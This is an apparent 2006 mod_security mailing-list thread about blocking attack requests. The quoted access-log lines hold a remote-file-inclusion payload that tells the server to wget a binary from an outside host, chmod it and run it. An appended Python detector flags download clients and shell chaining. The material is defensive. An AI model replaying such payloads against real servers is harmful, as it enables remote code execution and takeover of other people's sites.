Hi,
Just ban wget, fetch and other dl clients, and suspicious names in URLs, and of course you should secure
your PHP (safe_mode, disable_functions, open_basedir).
For xmlrpc you may filter on the POST payload; I'm not familiar with that security flaw.
IMHO you should give them a 404 and nothing more. I think the best defense is showing them that
there's nothing to exploit. When too many of these requests come to your webserver you may DoS the
system you're redirecting to, and give them a new target as well.
You may write letters to the abuse addresses of the network admins, because these are zombie
machines almost every time. On my webserver I got them coming from 3000-5000 addresses, but they're
referer spam. I redirect them to localhost (to their localhost) with mod_rewrite. :)
Computer users tend to be very ignorant about security flaws lately, so there's not much we can do
besides a 404. :(
Regards,
Andrej
Ral...@it... wrote:
> Hello,
>
> I guess evil noise like that is a mundane encounter for any WWW webserver admin,
> and probably an unavoidable plague, as spam is for SMTP relays.
>
> Because I haven't administered a WWW-serving webserver yet,
> I have luckily missed such filth so far.
>
> Of course these requests aren't serviced by our webserver, and mod_security dutifully
> sends them a 404; nevertheless they waste bandwidth, file system space for their
> logging, and processing resources.
>
> On the other hand I'm hesitant to drop those source IP addresses with my packet filter,
> because I suspect them (if not spoofed) to originate from an ISP's dynamic IP pool,
> and I would thereby block the next unlucky decent guy who happens to have such
> an abused IP address temporarily assigned.
>
> So I would like to ask you seasoned webserver admins how best to handle these requests?
>
> Do you simply drop them,
> or do you redirect them to sites e.g. such as
> http://www.gulli.com/ ,
> or some CERT blacklist etc.?
>
> As for mod_security,
> what would a neat filter look like to counter or trick them?
> Is the setup of a honeypot that would draw attention away from the webserver advisable,
> or is that in vain?
>
> Here's an excerpt from our access_log of requests trying to wget and run some hostile code
> through our webserver.
> As these reappear on a regular basis, I assume that some attack kits that generate them
> are in widespread use.
>
>
> 203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 208
> 203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 207
> 203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 214
> 203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 212
> 203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 223
> 203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 218
> 203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
> 203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 403 217
> 203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
> 203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
> 203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 403 219
> 203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 403 225
> 203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 222
> 203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
> 203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 403 219
> 203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 219
>
>
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>
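The filter Andrej suggests above (download clients and suspicious names in the URL) applied to the access_log excerpt from the original post, as an added example that is not code from either poster or from mod_security. It assumes Apache's common log format as shown in the excerpt; the sample lines are constructed from that excerpt plus one benign request from the documentation address 192.0.2.10, and the tag names, regexes and the `parse_line`/`classify`/`scan` functions are the example's own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample: five of the request lines quoted in the post (same
# source IP, same payload host) plus one benign request from a documentation
# address, so the detector has something it must leave alone.
SAMPLE_LOG = r'''
203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 208
203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 214
203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 403 219
203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 222
192.0.2.10 - - [23/Feb/2006:04:01:00 +0100] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120
'''

# Apache common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$')

# A download client invoked after a shell separator (or at the start of a
# command), with its first argument captured so the payload host can be reported.
DL_CLIENT_RE = re.compile(
    r'(?:^|[;|&`\s])(?:wget|curl|fetch|lynx|lwp-download)\s+(?P<arg>[^\s;|&`]+)', re.I)
# Command chaining of the "cd /tmp; ...; chmod ...; ./binary" kind.
SHELL_CHAIN_RE = re.compile(r'[;|`]\s*(?:cd\s|chmod\s|\./|perl\s|sh\s)')
# A parameter whose value is a remote URL (remote file inclusion attempt).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)


def parse_line(line):
    """Parse one common-log-format line; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    path, _, query = entry['target'].partition('?')   # split at the first '?' only
    entry['path'] = path
    # (key, raw_value) pairs; values are decoded in classify(), once.
    entry['params'] = [tuple(kv.partition('=')[::2]) for kv in query.split('&') if kv]
    return entry


def classify(entry):
    """Return (tags, payload_hosts) for one parsed entry."""
    tags, hosts = set(), set()
    for _key, raw in entry['params']:
        value = unquote(raw)   # %20 etc. hide the spaces and separators
        if REMOTE_URL_RE.match(value):
            tags.add('remote_include')
            host = urlsplit(value).hostname
            if host:
                hosts.add(host)
        m = DL_CLIENT_RE.search(value)
        if m:
            tags.add('download_client')
            arg = REMOTE_URL_RE.sub('', m.group('arg'))
            hosts.add(arg.split('/', 1)[0])
        if SHELL_CHAIN_RE.search(value):
            tags.add('shell_chain')
    # Blind POSTs to xmlrpc.php under guessed paths that the server refused.
    if entry['method'] == 'POST' and entry['path'].endswith('/xmlrpc.php') and entry['status'] >= 400:
        tags.add('xmlrpc_probe')
    return tags, hosts


def scan(log_text):
    """Aggregate per source IP: request count, flagged count, tag counts, payload hosts."""
    report = defaultdict(lambda: {'requests': 0, 'flagged': 0,
                                  'tags': Counter(), 'payload_hosts': set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rec = report[entry['ip']]
        rec['requests'] += 1
        tags, hosts = classify(entry)
        if tags:
            rec['flagged'] += 1
            rec['tags'].update(tags)
            rec['payload_hosts'].update(hosts)
    return dict(report)


if __name__ == '__main__':
    for ip, rec in scan(SAMPLE_LOG).items():
        print(ip, rec['flagged'], '/', rec['requests'], dict(rec['tags']),
              sorted(rec['payload_hosts']))
```

Two addresses come out of every flagged request, and they play different roles in the thread's abuse-letter suggestion: the source IP (203.221.23.212 here) is the probable zombie on a dynamic pool, while the payload host (209.123.16.34) is the machine actually serving the binary and is the more durable thing to report. Because the source may be reassigned to someone innocent, the per-IP `flagged` count rather than a single hit is what should drive any temporary block; the decoded tokens the regexes key on (a URL in a parameter value, a download client after a `;`) are also what a mod_security filter on the request arguments would match, since the raw line hides them behind `%20`.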